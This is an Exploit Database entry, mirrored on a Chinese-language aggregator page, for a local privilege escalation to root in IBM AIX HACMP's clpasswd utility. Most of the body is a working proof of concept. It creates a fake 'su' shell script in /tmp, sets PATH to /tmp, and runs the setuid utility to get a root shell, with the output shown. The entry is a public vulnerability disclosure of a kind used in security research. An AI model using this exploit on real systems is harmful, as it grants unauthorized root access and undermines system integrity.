IBM AIX High Availability Cluster Multiprocessing (HACMP) – Local Privilege Escalation

• Exploit Database
• 17 阅读

• 作者： Kristian Erik Hermansen
  日期： 2015-09-08
• 类别：

  • local
  平台：

  • aix
• 来源：https://www.exploit-db.com/exploits/38106/

• IBM AIX High Availability Cluster Multiprocessing (HACMP) LPE to root 0day
  
  Let's kill some more bugs today and force vendor improvement :)
  
  """
  $ cat /tmp/su
  #!/bin/sh
  /bin/sh
  $ chmod +x /tmp/su
  $ PATH=/tmp /usr/es/sbin/cluster/utilities/clpasswd
  # /usr/bin/whoami
  root
  """
  
  References:
  https://en.wikipedia.org/wiki/IBM_High_Availability_Cluster_Multiprocessing
  http://www-01.ibm.com/support/knowledgecenter/SSPHQG_6.1.0/com.ibm.hacmp.admngd/ha_admin_clpasswd.htm
  
  --
  Kristian Erik Hermansen (@h3rm4ns3c)
  https://www.linkedin.com/in/kristianhermansen
  --